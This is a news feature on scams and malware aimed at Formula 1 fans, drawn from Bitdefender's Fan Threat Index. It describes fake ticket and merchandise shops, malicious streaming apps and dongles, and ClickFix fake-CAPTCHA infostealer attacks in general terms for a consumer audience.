Formula 1 is one of the most popular sports in the world today, boasting over 827 million highly passionate fans across the world in 2025, all tuning in to watch wins, losses, crashes, and (occasionally) disqualifications.
To say Formula 1 fans get emotional is an understatement, and when there is a chance to win, many will go to extreme lengths to watch it happen – and not always legitimately – and for a threat actor, that pool of 827 million fans is an unmissable opportunity.
But participation goes beyond just watching the sport. The allure of cheap or discounted merchandise, dubious free streaming services, and the too-good-to-be-true offers play on the high-stakes nature of the sport, and the emotions of passionate fans – we spoke to security giants (and Ferrari partners) Bitdefender to find out more.
Bitdefender Threat Index
At Pista di Fiorano, Ferrari’s private racetrack in Italy, I was part of a group of journalists given exclusive access to Bitdefender’s Fan Threat Index, which has collated data on the threats facing fans since March 2025.
Bogdan Botezatu, Senior Director of Threat Research & Reporting at Bitdefender, was on hand to guide us through the report.
“Scams are evolving. Last year, cybercrime was making about $9 trillion in losses at the global scale. Out of that $9 trillion slice, about $1 trillion is responsible for scamming,” he said. “This Fan Threat Index is our response to how scams are evolving.”
The Formula 1 teams themselves face a huge array of threats. There is the potential for not only malware and ransomware, but also physical infiltration to steal intellectual property and secrets – and that is why teams form partnerships exactly like Ferrari’s partnership with Bitdefender, which can offer the teams the expertise and solutions they need to stay protected.
“At home though, things are fundamentally different,” Botezatu notes. “When things are moving fast, people make mistakes, and those mistakes cost.”
He explains there are four major threats that Formula 1 fans face. “The motorsport ecosystem is dominated by speed; you have to source tickets fast; you have to get the right merchandise from the right vendor; you have to find a streaming partner to watch the show at home; you have to face that emotional involvement that happens on race weekend.”
Last minute tickets and counterfeit merchandise
The ultimate thrill for a Formula 1 fan is almost certainly the opportunity to watch a race in person. In order to make cheap or discounted tickets even more alluring, scammers will seek to lower the cost of entry by offering ticket lotteries and giveaways.
Attending in the merchandise of a fan’s chosen team adds to the allure, and these forms of scam usually spike in the run up to a race as eager fans look for last minute tickets, and finalize their race-day outfits.
The main target for scammers is the theft of financial information. Drawn in by the urgency of an “80% OFF” banner and a storefront that looks legitimate, many fans will trade their banking details for a knock-off hat.
These websites are hosted on short-lived domains that are quickly recycled once the event is over, and are most commonly disseminated through social media.
“These cybercrime groups are using stolen accounts that have credit cards attached to boost promoted posts,” Botezatu explains. “That’s how they reach the right audiences, and that’s how they advertise their offers in front of the right people.”
“They are maximizing their profits using social media tactics,” he adds, explaining that they can abuse the data social media conglomerates such as Meta collect on users to serve their adverts and promoted posts to people of a specific demographic, in a specific geographic area, or those above a specific income.
Free streaming serving up malware
As the build-up to a race reaches its highest intensity, threat actors will begin offering free streaming services to fans desperate to tune in. These websites won’t necessarily only show Formula 1, but will serve a range of content from around the world to funnel in as many users as possible.
In many cases, the dubious streaming service will require that you install a VPN in order to watch. While this is sometimes a legitimate way to watch content that typically would not be available in a user’s region, the services these streaming providers offer are sometimes far from legitimate.
In a best case scenario, Botezatu explains, you’ll end up purchasing a legitimate streaming service that you don’t actually need and you still won’t be able to watch the race, but it will provide the service owner with a source of affiliate revenue. “Worst case, that VPN kit will be malware. and you’re going to infect your computer or device.”
For those on Android devices, some services will require the installation of a third-party video player in order to access a stream, and again, you will install malware. In these circumstances, Botezatu notes, the malware will often monitor your clipboard or your screen to track everything you type into your device, including sensitive banking and financial information.
The alternative some fans turn to is the dodgy-streaming dongle. Where legitimate streaming dongles such as the Amazon Fire Stick start from around $30, some groups will disseminate streaming dongles with preinstalled software for far less, and sometimes at a loss.
While a fan may feel like they’re just got a great deal and free access to every upcoming race, the reality is far sinister. “The people who are selling these are using Formula 1 as a pretext for you to open a proxy; an exit node in a VPN used for cybercrime,” Botezatu says.
“These people give you hardware for free, but instead can sell access to your household to various cybercrime groups that are doing money laundering, illegal content distribution, child pornography, all sorts of things,” he adds.
These devices use your IP address to distribute their illegal content, meaning that when law enforcement investigates these crimes, it could be your house they’re raiding.
Hollywood and modern TV has taught many people that hacking is a highly complex, intelligent pursuit that requires the layman to say, “In English, damn it!”
But the malware distribution scams Bitdefender has spotted targeting some Formula 1 fans are incredibly simple that they border on genius.
Those in the know may have heard of ClickFix attacks, whereby an attacker presents the user with a problem that needs to be solved in order to access a website or service. When many of us are presented with a CAPTCHA to solve, we recognize the familiarity of the branding and will trust that it’s legitimate.
But ClickFix attacks abuse this trust, and rather than clicking on all the bicycles in an image, the user will instead be prompted to open the Windows Terminal using a keyboard shortcut, and then use the “Ctrl” + “V” shortcut to paste in a line of code that the hacker has snuck into the clipboard.
For many antivirus suites, even first-rate protection, this activity appears to be legitimate human activity. The antivirus will do nothing to stop it, and the code will launch a powershell application that immediately installs infostealing software onto the infected device. The infostealer will then harvest browser passwords, session cookies, saved credit cards, VPN credentials, and email access – leading to even bigger problems for fans.
Our advice to Formula 1 fans? Always be on your guard when hunting for online streams, tickets and merch sales, and other linked activity – and remember, if an offer feels like it could be too good to be true, then it probably is.
